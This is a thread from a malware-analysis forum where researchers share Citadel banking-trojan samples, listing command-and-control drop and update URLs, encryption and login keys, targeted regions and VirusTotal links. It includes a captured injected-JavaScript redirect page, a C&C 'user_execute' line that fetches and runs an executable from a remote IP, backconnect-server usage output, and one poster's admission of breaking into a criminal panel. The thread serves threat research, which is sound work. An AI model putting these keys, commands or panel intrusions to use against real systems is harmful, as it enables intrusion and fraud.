A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #21709  by Xylitol
 Tue Dec 17, 2013 2:30 pm
Citadel almost no trigger, just facebook
Code: Select all
Drop: hxtp://dargs.su/citadm/vorota.php
Update: hxtp://dargs.su/citadm/file.php|file=soft.exe
Login key: C1F20D2340B519056A7D89B7DF4B0FFF
Key: C5 88 D5 B3 FC A8 1A 41 50 15 C6 5C A1 8A DA 60
mitb panel anyway but seem dead > http://jsunpack.jeek.org/?report=e3544e ... 9ab55e8000
Attachments
infected
(264.62 KiB) Downloaded 71 times
 #21712  by Xylitol
 Tue Dec 17, 2013 2:52 pm
Targeting Spain, Canada, America, Paypal, United Kingdom
Code: Select all
Drop: hxtp://secctor.ru/image/gate.php
Update: hxtp://secctor.ru/image/file.php|file=soft.exe
Login key: C1F20D2340B519056A7D89B7DF4B0FFF
Key: E6 C0 56 0D 4D 74 8C 9A 49 21 DD DD 1B 92 CF 4B
https://zeustracker.abuse.ch/monitor.ph ... secctor.ru
https://www.virustotal.com/en/file/4a9e ... /analysis/
Attachments
infected
(281.98 KiB) Downloaded 67 times
 #21768  by Xylitol
 Sun Dec 22, 2013 3:40 pm
Targeting Italy
Code: Select all
Drop: hxtp://109.235.50.169:53811/pr/2.php
Update: hxtp://109.235.50.169:53811/pr/1.php|file=soft.exe
Login key: C1F20D2340B519056A7D89B7DF4B0FFF
Key: 70 B9 17 DE D7 62 9C 00 45 80 99 DA FE 67 0E 88
https://zeustracker.abuse.ch/monitor.ph ... 235.50.169
https://www.virustotal.com/en/file/41d0 ... /analysis/
WebInj:
Code: Select all
https://www.ddxalee.com/expupkin/pp/admin/
Image
Attachments
infected
(256.26 KiB) Downloaded 70 times
 #21771  by Xylitol
 Sun Dec 22, 2013 5:55 pm
Targeting nothing.
Code: Select all
Drop: hxtp://91.229.78.150/cit/gate.php
Update: hxtp://91.229.78.150/cit/file.php|file=soft.exe
Login key: C1F20D2340B519056A7D89B7DF4B0FFF
Key: D7 A9 0A E3 C3 21 EF 59 73 D9 2D 9C 77 44 F3 CB
https://zeustracker.abuse.ch/monitor.ph ... 229.78.150
https://www.virustotal.com/en/file/7dbe ... /analysis/
Attachments
infected
(138.61 KiB) Downloaded 60 times
 #21782  by teddybear
 Tue Dec 24, 2013 6:40 pm
Xylitol wrote:Citadel almost no trigger, just facebook
Code: Select all
Drop: hxtp://dargs.su/citadm/vorota.php
Update: hxtp://dargs.su/citadm/file.php|file=soft.exe
Login key: C1F20D2340B519056A7D89B7DF4B0FFF
Key: C5 88 D5 B3 FC A8 1A 41 50 15 C6 5C A1 8A DA 60
mitb panel anyway but seem dead > http://jsunpack.jeek.org/?report=e3544e ... 9ab55e8000
Alive on same value33g[.]com IP 208,91,197,241 there's now:
Code: Select all
http://searchresultsguide.com/
No more on https but injected JS is working (tested a few minutes ago):
Code: Select all
http://searchresultsguide.com/nccvbv/gate.php?action=check_uid&site=facebook&uid=REDACTED&return_method=loader&pkey=password&ssid=REDACTED
Returns the following page (sorry for removing almost everything, but you can always try for yourself):
Code: Select all
<!--
	top.location="http://searchresultsguide.com/?fp=REDACTED&prvtof=REDACTED&poru=REDACTED&cifr=1&action=check_uid&site=facebook&uid=REDACTED&return_method=loader&pkey=password&ssid=REDACTED";
	/*
-->
<script type="text/javascript">
	<!--
	dimensionUpdated = 0;
	function applyFrameKiller()
	{
		if(window.top != self)
		{
			cHeight = 0;
			if( typeof( window.innerHeight ) != 'undefined' ) {
			//Non-IE
			cHeight = window.innerHeight;
			dimensionUpdated = 1;
			} else if( document.documentElement && ( document.documentElement.clientWidth || document.documentElement.clientHeight )  ) {
			//IE 6+ in 'standards compliant mode'
			cHeight = document.documentElement.clientHeight;
			dimensionUpdated = 1;
			} else if( document.body && ( document.body.clientWidth || document.body.clientHeight ) ) {
			//IE 4 compatible
			cHeight = document.body.clientHeight;
			dimensionUpdated = 1;
			}
			if( cHeight <= 250 && dimensionUpdated == 1)
			{
				window.top.location = "http://searchresultsguide.com/?fp=REDACTED&prvtof=REDACTED&poru=REDACTED&cifr=1&action=check_uid&site=facebook&uid=REDACTED&return_method=loader&pkey=password&ssid=REDACTED";
			}
		}
	}

	applyFrameKiller();
	// -->
</script><frameset rows="100%,*" frameborder="no" border="0" framespacing="0">
	<frame src="http://searchresultsguide.com/?fp=REDACTED&prvtof=REDACTED&poru=REDACTED&action=check_uid&site=facebook&uid=REDACTED&return_method=loader&pkey=password&ssid=REDACTED">
</frameset>
<noframes>
	<body bgcolor="#ffffff" text="#000000">
	<a href="http://searchresultsguide.com/?fp=REDACTED&prvtof=REDACTED&poru=REDACTED&action=check_uid&site=facebook&uid=REDACTED&return_method=loader&pkey=password&ssid=REDACTED">Click here to proceed</a>.
	</body>
</noframes><!--
*/
-->
Then I guess what follows is some shitty ads.
 #21811  by Xylitol
 Sat Dec 28, 2013 10:25 am
Some Citadel, see comments on VT for more infos.

https://www.virustotal.com/en/file/81b4 ... /analysis/
https://www.virustotal.com/en/file/8b55 ... /analysis/
https://www.virustotal.com/en/file/04c6 ... /analysis/
https://www.virustotal.com/en/file/9756 ... /analysis/
https://www.virustotal.com/en/file/b1c3 ... /analysis/
https://www.virustotal.com/en/file/bb9d ... /analysis/
https://www.virustotal.com/en/file/c66d ... /analysis/
https://www.virustotal.com/en/file/6aab ... /analysis/
https://www.virustotal.com/en/file/8f14 ... /analysis/
https://www.virustotal.com/en/file/6046 ... /analysis/
https://www.virustotal.com/en/file/49e3 ... /analysis/
https://www.virustotal.com/en/file/70c1 ... /analysis/
https://www.virustotal.com/en/file/5f97 ... /analysis/
https://www.virustotal.com/en/file/ab79 ... /analysis/
https://www.virustotal.com/en/file/5089 ... /analysis/
https://www.virustotal.com/en/file/2400 ... /analysis/
https://www.virustotal.com/en/file/4a9e ... /analysis/
https://www.virustotal.com/en/file/4446 ... /analysis/
https://www.virustotal.com/en/file/42ec ... /analysis/
https://www.virustotal.com/en/file/e3ca ... /analysis/
https://www.virustotal.com/en/file/828f ... /analysis/
https://www.virustotal.com/en/file/2f25 ... 387204495/
https://www.virustotal.com/en/file/6233 ... /analysis/
https://www.virustotal.com/en/file/359b ... /analysis/
https://www.virustotal.com/en/file/255c ... /analysis/
https://www.virustotal.com/en/file/6ef4 ... /analysis/
https://www.virustotal.com/en/file/71ea ... /analysis/
https://www.virustotal.com/en/file/c2ca ... /analysis/
https://www.virustotal.com/en/file/20ca ... /analysis/
https://www.virustotal.com/en/file/be0f ... /analysis/
https://www.virustotal.com/en/file/753c ... /analysis/
https://www.virustotal.com/en/file/fe12 ... /analysis/
https://www.virustotal.com/en/file/eed7 ... /analysis/
https://www.virustotal.com/en/file/fd71 ... /analysis/
https://www.virustotal.com/en/file/4c8c ... /analysis/
https://www.virustotal.com/en/file/7810 ... /analysis/
https://www.virustotal.com/en/file/5da3 ... /analysis/
https://www.virustotal.com/en/file/fd71 ... /analysis/
https://www.virustotal.com/en/file/a687 ... /analysis/
https://www.virustotal.com/en/file/3e7f ... /analysis/
https://www.virustotal.com/en/file/b70f ... /analysis/
https://www.virustotal.com/en/file/8a59 ... /analysis/
https://www.virustotal.com/en/file/4c6d ... 387473145/
https://www.virustotal.com/en/file/7ca9 ... /analysis/
https://www.virustotal.com/en/file/5c03 ... /analysis/
https://www.virustotal.com/en/file/710b ... /analysis/
https://www.virustotal.com/en/file/4569 ... /analysis/
https://www.virustotal.com/en/file/e675 ... /analysis/
https://www.virustotal.com/en/file/7dbe ... /analysis/
https://www.virustotal.com/en/file/41d0 ... /analysis/
https://www.virustotal.com/en/file/a37b ... /analysis/
https://www.virustotal.com/en/file/7791 ... /analysis/
https://www.virustotal.com/en/file/d1d8 ... /analysis/
https://www.virustotal.com/en/file/ce6f ... /analysis/
https://www.virustotal.com/en/file/b620 ... /analysis/
https://www.virustotal.com/en/file/0ffc ... /analysis/
https://www.virustotal.com/en/file/1edc ... /analysis/
https://www.virustotal.com/en/file/a317 ... /analysis/
https://www.virustotal.com/en/file/60bc ... /analysis/
https://www.virustotal.com/en/file/e5d5 ... /analysis/
https://www.virustotal.com/en/file/a19c ... /analysis/
 #21815  by Xylitol
 Sun Dec 29, 2013 1:06 pm
One year old article and no hash provided, it would be hard to get it :D
This one maybe https://www.virustotal.com/en/file/b487 ... 388323320/
i got it from http://vxvault.siri-urz.net/ViriList.ph ... 8e4b786d1e
Attachments
infected
(13.44 KiB) Downloaded 78 times
 #21820  by patriq
 Sun Dec 29, 2013 10:20 pm
Worked on a Citadel C&C from ZeuS Tracker
Code: Select all
Panel:
http://173.242.112.135/office/obi/server/cp.php?m=login
Script was running:

user_execute hxtp://142.0.36.226/office/nh.exe
Code: Select all
nh.exe - cf2cfc5354b62dc0d9bf42a0a3841437 (attached)
I think its a Citadel? some av vendors say zBot, etc. 
https://malwr.com/analysis/MzVlOWJjYzNh ... MwYzZlYzQ/
https://www.virustotal.com/en/file/cf44 ... 388343199/

I broke into the panel this weekend. Made a post about it since the server has been abandoned.

http://protectyournet.blogspot.com/2013 ... 12135.html
Attachments
infected
(577.75 KiB) Downloaded 67 times
Last edited by Xylitol on Sun Dec 29, 2013 10:32 pm, edited 1 time in total. Reason: link obfuscation
 #21822  by g4m372
 Mon Dec 30, 2013 12:54 pm
Xylitol wrote:One year old article and no hash provided, it would be hard to get it :D
This one maybe https://www.virustotal.com/en/file/b487 ... 388323320/
i got it from http://vxvault.siri-urz.net/ViriList.ph ... 8e4b786d1e
but first try looks good (at least in my sandbox) ... THX A LOT !

# cat output.txt
Citadel Backconnect Server 1.3.5.1.
Build time: 22:04:47 16.10.2012 GMT.

Usage: cbcs.exe <command> -<switch 1> -<switch N>

listen Start a backconnect server for one bot.
-nologo Suppresses display of sign-on banner.
-ipv4 Listen on IPv4 port.
-ipv6 Listen on IPv6 port.
-bp:[port] TCP port for accepting a connection from bot.
-cp:[port] TCP port for accepting a connection from ?lient.
  • 1
  • 12
  • 13
  • 14
  • 15
  • 16
  • 20